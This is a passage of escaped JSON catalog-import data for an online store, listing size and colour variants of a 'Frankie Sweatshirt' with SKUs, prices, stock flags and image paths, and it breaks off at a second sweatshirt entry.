nfigurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},{\"sku\":\"MH04-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-M-Yellow\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},{\"sku\":\"MH04-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-L-Green\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh04-green_alt1.jpg,\\/m\\/h\\/mh04-green_back.jpg\",\"image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh04-green_alt1.jpg,\\/m\\/h\\/mh04-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},{\"sku\":\"MH04-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-L-White\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},{\"sku\":\"MH04-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-L-Yellow\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},{\"sku\":\"MH04-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-XL-Green\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh04-green_alt1.jpg,\\/m\\/h\\/mh04-green_back.jpg\",\"image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh04-green_alt1.jpg,\\/m\\/h\\/mh04-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},{\"sku\":\"MH04-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-XL-White\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},{\"sku\":\"MH04-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-XL-Yellow\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},{\"sku\":\"MH04\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=Organic Cotton,pattern=Solid,climate=All-weather|Cool|Indoor|Spring|Windy,eco_collection=Yes,performance_fabric=Yes,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH04-XS-Green,size=XS,color=Green|sku=MH04-XS-White,size=XS,color=White|sku=MH04-XS-Yellow,size=XS,color=Yellow|sku=MH04-S-Green,size=S,color=Green|sku=MH04-S-White,size=S,color=White|sku=MH04-S-Yellow,size=S,color=Yellow|sku=MH04-M-Green,size=M,color=Green|sku=MH04-M-White,size=M,color=White|sku=MH04-M-Yellow,size=M,color=Yellow|sku=MH04-L-Green,size=L,color=Green|sku=MH04-L-White,size=L,color=White|sku=MH04-L-Yellow,size=L,color=Yellow|sku=MH04-XL-Green,size=XL,color=Green|sku=MH04-XL-White,size=XL,color=White|sku=MH04-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh04-green_alt1.jpg,\\/m\\/h\\/mh04-green_back.jpg\",\"image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh04-green_alt1.jpg,\\/m\\/h\\/mh04-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Indoor|Spring|Windy\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},{\"sku\":\"MH05-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-XS-Green\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 